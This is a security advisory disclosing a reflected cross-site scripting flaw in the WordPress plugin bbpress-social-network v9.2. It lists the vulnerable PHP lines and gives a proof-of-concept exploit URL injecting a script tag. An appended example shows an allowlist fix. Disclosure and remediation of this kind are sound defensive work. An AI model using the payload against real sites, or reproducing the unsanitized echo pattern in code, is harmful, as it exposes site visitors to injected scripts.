Advisory #: 775
Title: Reflected XSS in WordPress plugin bbpress-social-network v9.2
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/bbpress-social-network
Downloads: 3365
Vendor Notified: 2016-02-09
Vendor Contact: plugins@wordpress.org
Plugin Name: bbpress-social-network
Vulnerability:
There is a reflected XSS vulnerability in the following PHP code, ./bbpress-social-network/css/ln_livenotifications_cssback.php:

145:/*-moz-box-shadow: 10px 10px 5px <?php echo $_GET['dropdown_bgcolor'];?>;
146: -webkit-box-shadow: 10px 10px 5px <?php echo $_GET['dropdown_bgcolor'];?>;
147: box-shadow: 10px 10px 5px <?php echo $_GET['dropdown_bgcolor'];?>;
290: color: <?php echo $_GET['dropdown_color'];?>;
296: color: <?php echo $_GET['dropdown_color'];?>;
302: background-color: <?php echo $_GET['banner_bgcolor']?>;
486: /*background: <?php echo $_GET['dropdown_hover_bgcolor'];?>;*/
578: background: <?php echo $_GET['dropdown_bit_bgcolor'];?>;
579: color: <?php echo $_GET['dropdown_link_color']?>;
591: background: <?php echo $_GET['dropdown_hover_bgcolor'];?>;
597: background: <?php echo $_GET['dropdown_bit_bgcolor'];?>;
598: color: <?php echo $_GET['dropdown_link_color'];?>;
610: background: <?php echo $_GET['dropdown_hover_bgcolor'];?>;
643: background: <?php echo $_GET['dropdown_bit_bgcolor'];?>;
650: background-color: <?php echo $_GET['dropdown_bit_bgcolor'];?>;
658: background-color: <?php echo $_GET['dropdown_hover_bgcolor'];?>;
665: background-color: <?php echo $_GET['dropdown_bit_bgcolor'];?>;
698: color: <?php echo $_GET['dropdown_link_color'];?>;
702: color: <?php echo $_GET['dropdown_link_color'];?> !important;
706: color: <?php echo $_GET['dropdown_link_color'];?>;
711: color: <?php echo $_GET['dropdown_link_color'];?>;
716: color: <?php echo $_GET['dropdown_link_color'];?>;
747: color:<?php echo $_GET['dropdown_color'];?>;
755: color: <?php echo $_GET['dropdown_link_color'];?>;
765: color: <?php echo $_GET['dropdown_link_color'];?>;
799: color: <?php echo $_GET['dropdown_link_color'];?>;
806: color: <?php echo $_GET['dropdown_link_color'];?>;
828: /*background: <?php echo $_GET['dropdown_hover_bgcolor'];?> right center no-repeat;*/
848: color: <?php echo $_GET['dropdown_link_color'];?> !important;
861: color: <?php echo $_GET['dropdown_color'];?>;
866: border-top:1px solid <?php echo $_GET['dropdown_boder_color'];?>;
867: background: <?php echo $_GET['dropdown_bit_color'];?>;
872: background: <?php echo $_GET['dropdown_hover_bgcolor'];?>;
877: border-top:1px solid <?php echo $_GET['dropdown_bit_color'];?>;
920: border-top:1px solid <?php echo $_GET['dropdown_boder_color'];?>;
921: border-bottom:1px solid <?php echo $_GET['dropdown_boder_color'];?>;
924: color: <?php echo $_GET['dropdown_color'];?>;

The variable dropdown_bgcolor appears to send unsanitized data back to the user's browser.
CVE-ID: Not Released
File:./bbpress-social-network/css/ln_livenotifications_cssback.php
Exploit Code:
The exploit was derived from the first vulnerable parameter that appears in the code; there could be more among those shown above.
This is an untested autogenerated exploit:
http://[target]/wp-content/plugins/bbpress-social-network/css/ln_livenotifications_cssback.php?dropdown_bgcolor="><script>alert(1);</script><"
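
Added example, not code from the plugin or from the advisory author: every parameter listed under Vulnerability is echoed into a CSS color position, so each one can be checked against a strict color allowlist before it is written out. The helper css_color(), the selector names and the CLI sample input are assumptions made for illustration; the parameter names are the ones shown above.

```php
<?php
// Added example, not the plugin's code. css_color() is a hypothetical helper.

// Constructed sample input so the file can be run offline with `php file.php`;
// the first value is the payload from the advisory, the second a valid color.
if (PHP_SAPI === 'cli') {
    $_GET = [
        'dropdown_bgcolor' => '"><script>alert(1);</script><"',
        'dropdown_color'   => '#336699',
    ];
}

// Return the request parameter only if it is a plain CSS color (hex value or
// alphabetic keyword); anything else is replaced by a fixed fallback.
function css_color(string $param, string $fallback = 'inherit'): string
{
    $value = $_GET[$param] ?? '';
    if (!is_string($value)) {   // ?param[]=x arrives as an array
        return $fallback;
    }
    $value = trim($value);
    // #rgb, #rgba, #rrggbb, #rrggbbaa; \A and \z so a trailing newline fails
    if (preg_match('/\A#(?:[0-9a-fA-F]{3,4}|[0-9a-fA-F]{6}|[0-9a-fA-F]{8})\z/', $value)) {
        return $value;
    }
    // Keywords such as "red" or "transparent": letters only, bounded length
    if (preg_match('/\A[a-zA-Z]{3,20}\z/', $value)) {
        return strtolower($value);
    }
    return $fallback;
}

// Declare the response as a stylesheet and forbid MIME sniffing, so the
// browser does not treat the output as HTML.
header('Content-Type: text/css; charset=utf-8');
header('X-Content-Type-Options: nosniff');
?>
/* Selector names are hypothetical; parameter names are the ones listed above. */
.ln_dropdown {
    box-shadow: 10px 10px 5px <?php echo css_color('dropdown_bgcolor'); ?>;
    color: <?php echo css_color('dropdown_color'); ?>;
    border-top: 1px solid <?php echo css_color('dropdown_boder_color'); ?>;
}
.ln_dropdown a {
    color: <?php echo css_color('dropdown_link_color'); ?>;
}
```

Validation by allowlist is used here rather than HTML escaping because the values land in a CSS context, where htmlspecialchars() alone would still let arbitrary declarations through.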